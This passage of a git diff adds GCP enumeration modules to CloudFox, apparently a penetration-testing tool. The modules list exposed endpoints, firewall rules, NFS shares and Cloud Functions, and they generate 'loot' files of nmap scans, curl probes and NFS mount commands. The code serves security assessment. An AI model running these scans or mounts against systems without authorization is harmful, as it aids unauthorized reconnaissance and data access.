+ } else { + // Rule applies to instances with specific tags + for _, tag := range fw.TargetTags { + key := fmt.Sprintf("%s:%s", networkName, tag) + m.firewallPortMap[key] = append(m.firewallPortMap[key], rulePorts...) 
+ } + } + m.mu.Unlock() + + // Check if rule allows ingress from 0.0.0.0/0 (public access) + isPublic := false + for _, sr := range fw.SourceRanges { + if sr == "0.0.0.0/0" { + isPublic = true + break + } + } + + if isPublic { + fwRule := FirewallRule{ + ProjectID: projectID, + RuleName: fw.Name, + Network: networkName, + Direction: fw.Direction, + SourceRanges: fw.SourceRanges, + TargetTags: fw.TargetTags, + Ports: rulePorts, + } + + // Get protocol + if len(fw.Allowed) > 0 { + fwRule.Protocol = fw.Allowed[0].IPProtocol + } + + // Classify risk + fwRule.RiskLevel, fwRule.RiskReasons = m.classifyFirewallRisk(fwRule) + + m.mu.Lock() + m.FirewallRules = append(m.FirewallRules, fwRule) + m.mu.Unlock() + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list firewall rules in project %s", projectID)) + } +} + +// addEndpoint adds an endpoint thread-safely to appropriate list and to loot +func (m *EndpointsModule) addEndpoint(ep Endpoint) { + m.mu.Lock() + if ep.IsExternal { + m.ExternalEndpoints = append(m.ExternalEndpoints, ep) + } else { + m.InternalEndpoints = append(m.InternalEndpoints, ep) + } + m.addEndpointToLoot(ep) + m.mu.Unlock() +} + +// classifyInstanceRisk determines the risk level of an exposed instance +func (m *EndpointsModule) classifyInstanceRisk(instance *compute.Instance) (string, []string) { + var reasons []string + score := 0 + + reasons = append(reasons, "Has external IP") + score += 1 + + for _, sa := range instance.ServiceAccounts { + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine SA") + score += 2 + } + + for _, scope := range sa.Scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" { + reasons = append(reasons, "Has cloud-platform scope (full access)") + score += 3 + } + } + } + + if score >= 4 { + return "Critical", reasons + } else if score >= 2 { + return "High", 
reasons + } + return "Medium", reasons +} + +// classifyFirewallRisk determines the risk level of a public firewall rule +func (m *EndpointsModule) classifyFirewallRisk(rule FirewallRule) (string, []string) { + var reasons []string + score := 0 + + reasons = append(reasons, "Allows traffic from 0.0.0.0/0") + score += 1 + + dangerousPorts := map[string]string{ + "22": "SSH", + "3389": "RDP", + "3306": "MySQL", + "5432": "PostgreSQL", + "27017": "MongoDB", + "6379": "Redis", + "9200": "Elasticsearch", + } + + for _, port := range rule.Ports { + if name, ok := dangerousPorts[port]; ok { + reasons = append(reasons, fmt.Sprintf("Exposes %s (port %s)", name, port)) + score += 3 + } + if strings.Contains(port, "-") { + reasons = append(reasons, fmt.Sprintf("Wide port range: %s", port)) + score += 2 + } + } + + if len(rule.TargetTags) == 0 { + reasons = append(reasons, "No target tags (applies to all instances)") + score += 2 + } + + if score >= 5 { + return "Critical", reasons + } else if score >= 3 { + return "High", reasons + } + return "Medium", reasons +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func extractResourceName(url string) string { + if url == "" { + return "" + } + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func extractRegionFromScope(scope string) string { + // Format: regions/us-central1 + parts := strings.Split(scope, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return scope +} + +func extractZoneFromScope(scope string) string { + // Format: zones/us-central1-a + parts := strings.Split(scope, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return scope +} + +// getIPAndHostname extracts IP address and hostname from an endpoint +// Returns "-" for fields that are not applicable +func getIPAndHostname(ep Endpoint) (ipAddr string, hostname string) { + ipAddr = "-" + hostname = "-" + + // If we have an IP 
address (Address field) + if ep.Address != "" { + ipAddr = ep.Address + } + + // If we have a FQDN/hostname + if ep.FQDN != "" { + // Strip protocol prefix + host := ep.FQDN + host = strings.TrimPrefix(host, "https://") + host = strings.TrimPrefix(host, "http://") + // Remove any trailing path + if idx := strings.Index(host, "/"); idx != -1 { + host = host[:idx] + } + hostname = host + } + + return ipAddr, hostname +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *EndpointsModule) initializeLootFiles() { + m.LootMap["endpoints-external-commands"] = &internal.LootFile{ + Name: "endpoints-external-commands", + Contents: "# External Endpoints Scan Commands\n" + + "# Generated by CloudFox\n" + + "# Use these commands for authorized penetration testing of internet-facing resources\n\n", + } + m.LootMap["endpoints-internal-commands"] = &internal.LootFile{ + Name: "endpoints-internal-commands", + Contents: "# Internal Endpoints Scan Commands\n" + + "# Generated by CloudFox\n" + + "# Use these commands for authorized internal network penetration testing\n" + + "# Note: These targets require internal network access or VPN connection\n\n", + } +} + +func (m *EndpointsModule) addEndpointToLoot(ep Endpoint) { + target := ep.Address + if target == "" { + target = ep.FQDN + } + if target == "" { + return + } + + // Strip protocol prefix for nmap (needs just hostname/IP) + hostname := target + hostname = strings.TrimPrefix(hostname, "https://") + hostname = strings.TrimPrefix(hostname, "http://") + // Remove any trailing path + if idx := strings.Index(hostname, "/"); idx != -1 { + hostname = hostname[:idx] + } + + // Build nmap command based on endpoint type and port info + var nmapCmd string + switch { + case ep.Port == "ALL" || ep.Port == "": + // Unknown ports - scan all common ports (or full range for internal) + if ep.IsExternal { + nmapCmd = fmt.Sprintf("nmap -sV -Pn %s", hostname) + } else { + // For internal, 
scan all ports since we don't know what's open + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p- %s", hostname) + } + case strings.Contains(ep.Port, ","): + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, hostname) + case strings.Contains(ep.Port, "-"): + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, hostname) + default: + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, hostname) + } + + // Select appropriate loot file + lootKey := "endpoints-external-commands" + if !ep.IsExternal { + lootKey = "endpoints-internal-commands" + } + + m.LootMap[lootKey].Contents += fmt.Sprintf( + "# %s: %s (%s)\n"+ + "# Project: %s | Region: %s | Network: %s\n"+ + "%s\n\n", + ep.Type, ep.Name, ep.ResourceType, + ep.ProjectID, ep.Region, ep.Network, + nmapCmd, + ) + + // Add HTTP/HTTPS test for web-facing endpoints + if ep.Type == "LoadBalancer" || ep.Type == "Global LoadBalancer" || ep.Type == "Cloud Run" { + if ep.TLSEnabled || ep.Port == "443" { + m.LootMap[lootKey].Contents += fmt.Sprintf("curl -vk https://%s/\n\n", hostname) + } else { + m.LootMap[lootKey].Contents += fmt.Sprintf("curl -v http://%s/\n\n", hostname) + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Status column shows operational state: RUNNING, STOPPED, IN_USE, RESERVED, etc. 
+ header := []string{ + "Project ID", + "Project Name", + "Name", + "Type", + "IP Address", + "Hostname", + "Protocol", + "Port", + "Region", + "Network", + "Status", + } + + // External endpoints table + var externalBody [][]string + for _, ep := range m.ExternalEndpoints { + ipAddr, hostname := getIPAndHostname(ep) + externalBody = append(externalBody, []string{ + ep.ProjectID, + m.GetProjectName(ep.ProjectID), + ep.Name, + ep.Type, + ipAddr, + hostname, + ep.Protocol, + ep.Port, + ep.Region, + ep.Network, + ep.Status, + }) + } + + // Internal endpoints table + var internalBody [][]string + for _, ep := range m.InternalEndpoints { + ipAddr, hostname := getIPAndHostname(ep) + internalBody = append(internalBody, []string{ + ep.ProjectID, + m.GetProjectName(ep.ProjectID), + ep.Name, + ep.Type, + ipAddr, + hostname, + ep.Protocol, + ep.Port, + ep.Region, + ep.Network, + ep.Status, + }) + } + + // Firewall rules table (public 0.0.0.0/0 rules only) + var fwBody [][]string + if len(m.FirewallRules) > 0 { + for _, fw := range m.FirewallRules { + tags := strings.Join(fw.TargetTags, ",") + if tags == "" { + tags = "ALL" + } + fwBody = append(fwBody, []string{ + fw.ProjectID, + m.GetProjectName(fw.ProjectID), + fw.RuleName, + fw.Network, + fw.Protocol, + strings.Join(fw.Ports, ","), + tags, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + var tables []internal.TableFile + + if len(externalBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "endpoints-external", + Header: header, + Body: externalBody, + }) + } + + if len(internalBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "endpoints-internal", + Header: header, + Body: internalBody, + }) + } + + if len(fwBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "endpoints-firewall", + Header: []string{ + "Project ID", + 
"Project Name", + "Rule", + "Network", + "Protocol", + "Ports", + "Target Tags", + }, + Body: fwBody, + }) + } + + output := EndpointsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "exposure") + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/filestore.go b/gcp/commands/filestore.go new file mode 100644 index 00000000..23dd7334 --- /dev/null +++ b/gcp/commands/filestore.go @@ -0,0 +1,190 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + filestoreservice "github.com/BishopFox/cloudfox/gcp/services/filestoreService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFilestoreCommand = &cobra.Command{ + Use: globals.GCP_FILESTORE_MODULE_NAME, + Aliases: []string{"nfs", "files"}, + Short: "Enumerate Filestore NFS instances", + Long: `Enumerate Filestore instances and their file shares.`, + Run: runGCPFilestoreCommand, +} + +type FilestoreModule struct { + gcpinternal.BaseGCPModule + Instances []filestoreservice.FilestoreInstanceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type FilestoreOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FilestoreOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FilestoreOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPFilestoreCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FILESTORE_MODULE_NAME) + if err != nil { + 
return + } + + module := &FilestoreModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []filestoreservice.FilestoreInstanceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *FilestoreModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FILESTORE_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 { + logger.InfoM("No Filestore instances found", globals.GCP_FILESTORE_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d Filestore instance(s)", len(m.Instances)), globals.GCP_FILESTORE_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *FilestoreModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + svc := filestoreservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FILESTORE_MODULE_NAME, + fmt.Sprintf("Could not enumerate Filestore instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.Instances = append(m.Instances, instances...) 
+ for _, instance := range instances { + m.addToLoot(instance) + } + m.mu.Unlock() +} + +func (m *FilestoreModule) initializeLootFiles() { + m.LootMap["filestore-commands"] = &internal.LootFile{ + Name: "filestore-commands", + Contents: "# Filestore Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceInfo) { + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s\n", + instance.Name, instance.Location, + instance.ProjectID, + ) + + // gcloud command + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "gcloud filestore instances describe %s --location=%s --project=%s\n", + instance.Name, instance.Location, instance.ProjectID, + ) + + // Mount commands for each share + if len(instance.Shares) > 0 && len(instance.IPAddresses) > 0 { + m.LootMap["filestore-commands"].Contents += "# Mount commands:\n" + for _, share := range instance.Shares { + for _, ip := range instance.IPAddresses { + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "# Share: %s (%dGB)\n"+ + "mount -t nfs %s:/%s /mnt/%s\n", + share.Name, share.CapacityGB, + ip, share.Name, share.Name, + ) + } + } + } + + m.LootMap["filestore-commands"].Contents += "\n" +} + +func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "Tier", + "Network", + "IP", + "Shares", + "State", + } + + var body [][]string + for _, instance := range m.Instances { + var shareNames []string + for _, share := range instance.Shares { + shareNames = append(shareNames, share.Name) + } + + ip := strings.Join(instance.IPAddresses, ", ") + if ip == "" { + ip = "-" + } + + shares := strings.Join(shareNames, ", ") + if shares == "" { + shares = "-" + } + + network := instance.Network + if network == "" { + network = "-" + } + + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + 
instance.ProjectID, + instance.Name, + instance.Location, + instance.Tier, + network, + ip, + shares, + instance.State, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := FilestoreOutput{ + Table: []internal.TableFile{{Name: "filestore", Header: header, Body: body}}, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) +} diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go new file mode 100644 index 00000000..eb9d1acd --- /dev/null +++ b/gcp/commands/firewall.go @@ -0,0 +1,416 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + NetworkService "github.com/BishopFox/cloudfox/gcp/services/networkService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFirewallCommand = &cobra.Command{ + Use: globals.GCP_FIREWALL_MODULE_NAME, + Aliases: []string{"fw", "firewall-rules", "network-security"}, + Short: "Enumerate VPC networks and firewall rules with security analysis", + Long: `Enumerate VPC networks, subnets, and firewall rules across projects with security analysis. 
+ +Features: +- Lists all VPC networks and their peering relationships +- Shows all subnets with CIDR ranges and configurations +- Enumerates firewall rules with security risk analysis +- Identifies overly permissive rules (0.0.0.0/0 ingress) +- Detects exposed sensitive ports (SSH, RDP, databases) +- Generates gcloud commands for remediation + +Security Columns: +- Risk: HIGH, MEDIUM, LOW based on exposure analysis +- Direction: INGRESS or EGRESS +- Source: Source IP ranges (0.0.0.0/0 = internet) +- Ports: Allowed ports and protocols +- Issues: Detected security misconfigurations + +Attack Surface: +- 0.0.0.0/0 ingress allows internet access to resources +- All ports allowed means no port restrictions +- No target tags means rule applies to ALL instances +- VPC peering may expose internal resources`, + Run: runGCPFirewallCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type FirewallModule struct { + gcpinternal.BaseGCPModule + + Networks []NetworkService.VPCInfo + Subnets []NetworkService.SubnetInfo + FirewallRules []NetworkService.FirewallRuleInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type FirewallOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FirewallOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FirewallOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPFirewallCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FIREWALL_MODULE_NAME) + if err != nil { + return + } + + module := &FirewallModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Networks: []NetworkService.VPCInfo{}, + Subnets: []NetworkService.SubnetInfo{}, + FirewallRules: 
[]NetworkService.FirewallRuleInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *FirewallModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FIREWALL_MODULE_NAME, m.processProject) + + if len(m.FirewallRules) == 0 && len(m.Networks) == 0 { + logger.InfoM("No networks or firewall rules found", globals.GCP_FIREWALL_MODULE_NAME) + return + } + + // Count public ingress rules and peerings + publicIngressCount := 0 + for _, rule := range m.FirewallRules { + if rule.IsPublicIngress { + publicIngressCount++ + } + } + + peeringCount := 0 + for _, network := range m.Networks { + peeringCount += len(network.Peerings) + } + + msg := fmt.Sprintf("Found %d network(s), %d subnet(s), %d firewall rule(s)", + len(m.Networks), len(m.Subnets), len(m.FirewallRules)) + if publicIngressCount > 0 { + msg += fmt.Sprintf(" [%d public ingress]", publicIngressCount) + } + if peeringCount > 0 { + msg += fmt.Sprintf(" [%d peerings]", peeringCount) + } + logger.SuccessM(msg, globals.GCP_FIREWALL_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *FirewallModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating networks and firewall in project: %s", projectID), globals.GCP_FIREWALL_MODULE_NAME) + } + + ns := NetworkService.New() + + // Get networks + networks, err := ns.Networks(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate networks in project %s", projectID)) + } else { + m.mu.Lock() + 
m.Networks = append(m.Networks, networks...) + for _, network := range networks { + m.addNetworkToLoot(network) + } + m.mu.Unlock() + } + + // Get subnets + subnets, err := ns.Subnets(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate subnets in project %s", projectID)) + } else { + m.mu.Lock() + m.Subnets = append(m.Subnets, subnets...) + m.mu.Unlock() + } + + // Get firewall rules + rules, err := ns.FirewallRulesEnhanced(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate firewall rules in project %s", projectID)) + } else { + m.mu.Lock() + m.FirewallRules = append(m.FirewallRules, rules...) + for _, rule := range rules { + m.addFirewallRuleToLoot(rule) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d network(s), %d subnet(s), %d rule(s) in project %s", + len(networks), len(subnets), len(rules), projectID), globals.GCP_FIREWALL_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *FirewallModule) initializeLootFiles() { + m.LootMap["firewall-commands"] = &internal.LootFile{ + Name: "firewall-commands", + Contents: "# Firewall Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *FirewallModule) addNetworkToLoot(network NetworkService.VPCInfo) { + m.LootMap["firewall-commands"].Contents += fmt.Sprintf( + "# Network: %s\n"+ + "# Project: %s\n"+ + "gcloud compute networks describe %s --project=%s\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + ) 
+} + +func (m *FirewallModule) addFirewallRuleToLoot(rule NetworkService.FirewallRuleInfo) { + m.LootMap["firewall-commands"].Contents += fmt.Sprintf( + "# Rule: %s (%s)\n"+ + "# Project: %s\n"+ + "gcloud compute firewall-rules describe %s --project=%s\n\n", + rule.Name, rule.Network, + rule.ProjectID, + rule.Name, rule.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Firewall rules table + rulesHeader := []string{ + "Project Name", + "Project ID", + "Rule Name", + "Network", + "Direction", + "Priority", + "Source Ranges", + "Allowed", + "Targets", + "Disabled", + "Logging", + } + + var rulesBody [][]string + for _, rule := range m.FirewallRules { + // Format source ranges - no truncation + sources := strings.Join(rule.SourceRanges, ", ") + if sources == "" { + sources = "-" + } + + // Format allowed protocols - no truncation + allowed := formatProtocols(rule.AllowedProtocols) + if allowed == "" { + allowed = "-" + } + + // Format targets - no truncation + targets := "-" + if len(rule.TargetTags) > 0 { + targets = strings.Join(rule.TargetTags, ", ") + } else if len(rule.TargetSAs) > 0 { + targets = strings.Join(rule.TargetSAs, ", ") + } else { + targets = "ALL" + } + + rulesBody = append(rulesBody, []string{ + m.GetProjectName(rule.ProjectID), + rule.ProjectID, + rule.Name, + rule.Network, + rule.Direction, + fmt.Sprintf("%d", rule.Priority), + sources, + allowed, + targets, + boolToYesNo(rule.Disabled), + boolToYesNo(rule.LoggingEnabled), + }) + } + + // Networks table + networksHeader := []string{ + "Project Name", + "Project ID", + "Network Name", + "Routing Mode", + "Subnets", + "Peerings", + "Auto Subnets", + } + + var networksBody [][]string + for _, network := range m.Networks { + // Count subnets + subnetCount := len(network.Subnetworks) + + // Format peerings - no truncation + peerings := "-" + if 
len(network.Peerings) > 0 { + var peerNames []string + for _, p := range network.Peerings { + peerNames = append(peerNames, p.Name) + } + peerings = strings.Join(peerNames, ", ") + } + + networksBody = append(networksBody, []string{ + m.GetProjectName(network.ProjectID), + network.ProjectID, + network.Name, + network.RoutingMode, + fmt.Sprintf("%d", subnetCount), + peerings, + boolToYesNo(network.AutoCreateSubnetworks), + }) + } + + // Subnets table + subnetsHeader := []string{ + "Project Name", + "Project ID", + "Network", + "Subnet Name", + "Region", + "CIDR Range", + "Private Google Access", + } + + var subnetsBody [][]string + for _, subnet := range m.Subnets { + subnetsBody = append(subnetsBody, []string{ + m.GetProjectName(subnet.ProjectID), + subnet.ProjectID, + subnet.Network, + subnet.Name, + subnet.Region, + subnet.IPCidrRange, + boolToYesNo(subnet.PrivateIPGoogleAccess), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(rulesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-rules", + Header: rulesHeader, + Body: rulesBody, + }) + } + + if len(networksBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-networks", + Header: networksHeader, + Body: networksBody, + }) + } + + if len(subnetsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-subnets", + Header: subnetsHeader, + Body: subnetsBody, + }) + } + + output := FirewallOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err 
// formatProtocols renders a firewall rule's protocol/port map as a single
// display string, e.g. "tcp:80,443; udp:all". A protocol mapped to an empty
// port list means every port is allowed for that protocol, rendered as
// "<proto>:all".
//
// Go map iteration order is randomized, so the protocol names are sorted
// first to keep table and loot output deterministic across runs (important
// when diffing successive scans).
func formatProtocols(protocols map[string][]string) string {
	// Collect and order the protocol names. A tiny insertion sort is used
	// so this function needs no imports beyond what the file already has.
	keys := make([]string, 0, len(protocols))
	for proto := range protocols {
		i := len(keys)
		keys = append(keys, proto)
		for i > 0 && keys[i-1] > proto {
			keys[i] = keys[i-1]
			i--
		}
		keys[i] = proto
	}

	parts := make([]string, 0, len(keys))
	for _, proto := range keys {
		if ports := protocols[proto]; len(ports) == 0 {
			parts = append(parts, proto+":all")
		} else {
			parts = append(parts, proto+":"+strings.Join(ports, ","))
		}
	}
	return strings.Join(parts, "; ")
}
+ +Features: +- Lists all Cloud Functions (Gen 2) accessible to the authenticated user +- Shows security configuration (ingress settings, VPC connector, service account) +- Identifies publicly invokable functions (allUsers/allAuthenticatedUsers) +- Shows runtime, trigger type, and trigger configuration +- Counts environment variables and secret references +- Generates gcloud commands for further enumeration and exploitation + +Security Columns: +- Ingress: ALL_TRAFFIC (public), INTERNAL_ONLY, or INTERNAL_AND_GCLB +- Public: Whether allUsers or allAuthenticatedUsers can invoke the function +- ServiceAccount: The identity the function runs as (privilege level) +- VPCConnector: Network connectivity to VPC resources +- Secrets: Count of secret environment variables and volumes + +Attack Surface: +- Public HTTP functions may be directly exploitable +- Functions with default service account may have excessive permissions +- Functions with VPC connectors can access internal resources +- Event triggers reveal integration points (Pub/Sub, Storage, etc.)`, + Run: runGCPFunctionsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type FunctionsModule struct { + gcpinternal.BaseGCPModule + + Functions []FunctionsService.FunctionInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type FunctionsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FunctionsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FunctionsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPFunctionsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FUNCTIONS_MODULE_NAME) + if err != nil { + return + } + + module := 
&FunctionsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Functions: []FunctionsService.FunctionInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *FunctionsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FUNCTIONS_MODULE_NAME, m.processProject) + + if len(m.Functions) == 0 { + logger.InfoM("No Cloud Functions found", globals.GCP_FUNCTIONS_MODULE_NAME) + return + } + + // Count public functions + publicCount := 0 + for _, fn := range m.Functions { + if fn.IsPublic { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d function(s), %d PUBLIC", len(m.Functions), publicCount), globals.GCP_FUNCTIONS_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d function(s)", len(m.Functions)), globals.GCP_FUNCTIONS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *FunctionsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Functions in project: %s", projectID), globals.GCP_FUNCTIONS_MODULE_NAME) + } + + fs := FunctionsService.New() + functions, err := fs.Functions(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FUNCTIONS_MODULE_NAME, + fmt.Sprintf("Could not enumerate functions in project %s", projectID)) + return + } + + m.mu.Lock() + m.Functions = append(m.Functions, functions...) 
+ + for _, fn := range functions { + m.addFunctionToLoot(fn) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d function(s) in project %s", len(functions), projectID), globals.GCP_FUNCTIONS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *FunctionsModule) initializeLootFiles() { + m.LootMap["functions-commands"] = &internal.LootFile{ + Name: "functions-commands", + Contents: "# GCP Cloud Functions Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["functions-env-vars"] = &internal.LootFile{ + Name: "functions-env-vars", + Contents: "# Cloud Functions Environment Variables\n# Generated by CloudFox\n# Variable names that may hint at secrets\n\n", + } + m.LootMap["functions-secrets"] = &internal.LootFile{ + Name: "functions-secrets", + Contents: "# Cloud Functions Secret References\n# Generated by CloudFox\n# Secrets used by functions (names only)\n\n", + } +} + +func (m *FunctionsModule) addFunctionToLoot(fn FunctionsService.FunctionInfo) { + // All commands for this function + m.LootMap["functions-commands"].Contents += fmt.Sprintf( + "## Function: %s (Project: %s, Region: %s)\n"+ + "# Runtime: %s, Trigger: %s\n"+ + "# Service Account: %s\n"+ + "# Public: %v, Ingress: %s\n", + fn.Name, fn.ProjectID, fn.Region, + fn.Runtime, fn.TriggerType, + fn.ServiceAccount, + fn.IsPublic, 